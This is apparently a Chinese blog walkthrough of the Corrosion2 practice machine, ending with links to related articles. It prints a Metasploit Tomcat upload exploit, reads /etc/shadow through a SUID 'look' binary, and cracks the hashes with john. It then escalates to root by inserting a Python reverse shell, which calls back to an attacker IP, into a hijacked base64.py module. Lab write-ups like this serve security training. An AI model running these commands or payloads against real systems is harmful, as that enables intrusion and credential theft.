Corrosion2实战渗透(二)

简介: Corrosion2实战渗透
使用改模块
use 3


image.png


set HttpPassword melehifokivai
set Httpusername manager
set rhosts 192.168.43.4   
set rport 8080
msf6 exploit(multi/http/tomcat_mgr_upload) > show options
run


image.png


如下图所示成功反弹,获取shell


shell
whoami
uid


image.png


切换用户 jaye 的 shell
进入 meterpreter shell
使用 python 切换 bash
python3 -c 'import pty; pty.spawn("/bin/bash")'


image.png

cd /home
ls
发现两个用户名


image.png


cd /home/randy
ls -la
发现一些文件
cat note.txt


打开note.txt查看

嘿,兰迪,我是你的系统管理员,希望你有美好的一天!我只是想让你知道我更改了你主目录的权限。目前还不能删除或添加文件。


第一个flag,打开user.txt查看

cat user.txt
ca73a018ae6908a7d0ea5d1c269ba4b6


image.png


由于randy目录下面的文件不能修改,一些关键文件也无法查看,切换到其他用户目录看看

su jaye
melehifokivai   //密码,还是tomcat的密码
成功进入


image.png


查看etc/passwd文件


cat /etc/passwd


image.png


可以使用ssh登录


ssh @192.168.43.4
yes
melehifokivai 


image.png


id
whoami
pwn
ls -la


image.png



发现一些文件,查看files文件夹下面的look文件


cd Files
ls -la
cat look
file look
which look


image.png



是系统的look命令,look命令可以越权访问

https://gtfobins.github.io/gtfobins/look/),


cat /etc/passwd
LFILE=/etc/passwd
./look '' "$LFILE"


image.png


 

将/etc/shadow文件复制下来

注意:这里也可以直接查看flag。    ——  —— >>>>         ./look '' /root/root.txt

将/etc/passwd文件复制下来


image.png


将以上两个文件保存到本地


vim passwd
vim shadow
unshadow passwd shadow > pssword.txt
爆破
john --wordlist=/usr/share/wordlists/rockyou.txt ./password.txt 


image.png


破解出第一个账号密码(若干小时.........)


melehifokivai    (jaye)


image.png


破解出第二个账号密码(若干小时..........)

07051986randy (randy)


image.png


第二个flag


第一个账号已经找到相关内容,现在登录第二个账号

su randy
07051986randy
登录成功,进入账号


image.png


cd ..
ls
cd randy
ls -la


image.png

sudo -l
07051986randy


image.png


secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binl:/snap/bin用户randy可以执行以下命令:(root) PASSWD: /usr/bin/python3.8 /home/randy/randombase64.py


secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binl:/snap/bin用户randy可以执行以下命令:(root) PASSWD: /usr/bin/python3.8 /home/randy/randombase64.py


secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binl:/snap/bin用户randy可以执行以下命令:(root) PASSWD: /usr/bin/python3.8 /home/randy/randombase64.py


image.png


root会执行该文件,并且引用了base64模块


image.png


打开查看base64模块


cd /usr/bin/python3.8
ls -la base64.py
vi base64.py


image.png


插入以下shell     参考以下大佬博客

https://blog.csdn.net/Perpetual_Blue/article/details/124245059?utm_medium=distribute.pc_relevant.none-task-blog-2~default~baidujs_title~default-0-124245059-blog-122969392.pc_relevant_aa&spm=1001.2101.3001.4242.1&utm_relevant_index=3书签:靶机渗透练习37-Corrosion2_hirak0的博客-CSDN博客


import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("192.168.184.128",6666));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
import pty;
pty.spawn("/bin/bash")


image.png


命令行模式下执行:
set nobackup
set nowritebackup
set noswapfile
wq

在被攻击机上执行命令:sudo /usr/bin/python3.8 /home/randy/randombase64.py输入密码:07051986randy

执行之后,可以看到 nc 反弹 shell 成功,为 root 权限

网络图片:https://ucc.alicdn.com/images/user-upload-01/img_convert/e949a09c35c899402e11eb34f80fcb19.png


2fdbf8d4f894292361d6c72c8e833a4b


方法二:利用./look获取flag


ssh jaye@192.168.43.4                                               
jaye@192.168.43.4's password: 
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.11.0-34-generic x86_64)
......
$ pwd
/home/jaye
$ cd ..
$ ls
jaye  randy
$ cd ~
$ ls -la
total 92
drwxr-x--x 18 jaye jaye 4096 Aug  2 23:38 .
drwxr-xr-x  4 root root 4096 Sep 17  2021 ..
-rw-r--r--  1 root root    0 Sep 17  2021 .bash_history
-rw-r--r--  1 jaye jaye  220 Feb 25  2020 .bash_logout
-rw-r--r--  1 jaye jaye 3771 Feb 25  2020 .bashrc
drwx------ 12 jaye jaye 4096 Sep 17  2021 .cache
drwx------ 11 jaye jaye 4096 Sep 17  2021 .config
drwxr-xr-x  2 jaye jaye 4096 Sep 17  2021 Desktop
drwxr-xr-x  2 jaye jaye 4096 Sep 17  2021 Documents
drwxr-xr-x  2 jaye jaye 4096 Sep 17  2021 Downloads
drwxr-xr-x  2 root root 4096 Sep 17  2021 Files
drwx------  3 jaye jaye 4096 Sep 17  2021 .gnupg
drwxr-xr-x  3 jaye jaye 4096 Sep 17  2021 .local
drwx------  5 jaye jaye 4096 Sep 17  2021 .mozilla
drwxr-xr-x  2 jaye jaye 4096 Sep 17  2021 Music
-rw-rw-r--  1 jaye jaye 2929 Aug  2 23:35 passwd
drwxr-xr-x  2 jaye jaye 4096 Sep 17  2021 Pictures
-rw-r--r--  1 jaye jaye  807 Feb 25  2020 .profile
drwxr-xr-x  2 jaye jaye 4096 Sep 17  2021 Public
-rw-rw-r--  1 jaye jaye 1827 Aug  2 23:37 shadow
drwxr-xr-x  3 jaye jaye 4096 Sep 17  2021 snap
drwx------  2 jaye jaye 4096 Sep 17  2021 .ssh
drwxr-xr-x  2 jaye jaye 4096 Sep 17  2021 Templates
-rw-rw-r--  1 jaye jaye    0 Aug  2 23:38 userpass.txt
drwxr-xr-x  2 jaye jaye 4096 Sep 17  2021 Videos
$ cd Files
$ ls -la
total 24
drwxr-xr-x  2 root root  4096 Sep 17  2021 .
drwxr-x--x 18 jaye jaye  4096 Aug  2 23:38 ..
---s--s--x  1 root root 14728 Sep 17  2021 look
./look '' '/root/root.txt'


image.png

image.png

image.png


总结:


前期渗透思路和一般的方式一样,都是主机发现,端口扫描,更具端口查看服务

探测端口下面的目录  80    8080

8080下面发现突破点文件  

解压破解获得tomcat账号密码

tomcat登录上传war包反弹失败

使用msf下面的tomcat上传漏洞获取shell

查看文件  发现两个账号

登录randy    发现第一个flag

破解第二个账号密码

登录提权  获取第二个flag


相关文章
|
SQL 安全 前端开发
最近的一次渗透
最近的一次渗透
|
2月前
|
SQL 安全 测试技术
Web安全-渗透基础
Web安全-渗透基础
31 1
|
6月前
|
缓存 监控 安全
近源渗透
近源渗透
232 1
近源渗透
|
6月前
|
安全 应用服务中间件 PHP
黑客渗透知识点总结
黑客渗透知识点总结
|
6月前
|
安全 网络安全
网络渗透技术
网络渗透技术
124 2
|
运维 网络协议 数据安全/隐私保护
渗透环境搭建2
渗透环境搭建2
39 0
|
Ubuntu Linux 数据安全/隐私保护
渗透环境搭建
渗透环境搭建
61 0
|
SQL 安全 网络安全
网络安全攻防实战:探索互联网发展史
网络安全攻防实战:探索互联网发展史
97 0
|
安全 NoSQL Shell
梦中的一次渗透
昨天晚上一直做梦,今天就把昨天梦中的事情记录下来,本故事纯属虚构,如有雷同纯属巧合
78 0
|
Go 数据安全/隐私保护
某教程学习笔记(一):21、后渗透攻击
某教程学习笔记(一):21、后渗透攻击
134 0
某教程学习笔记(一):21、后渗透攻击